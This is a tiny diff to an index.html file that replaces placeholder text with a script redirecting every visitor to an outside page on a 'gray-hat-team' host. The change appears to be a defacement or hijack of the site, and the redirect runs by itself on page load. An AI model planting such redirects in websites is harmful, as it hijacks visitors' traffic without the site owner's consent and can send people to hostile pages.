--- a/index.html
+++ b/index.html
@@ -1,2 +1,3 @@
-hlllllll
-<h2>hihllw</h2>
+<script type="text/javascript">
+	document.location='http://gray-hat-team.freeweb.pk/unque-collection/'
+</script>
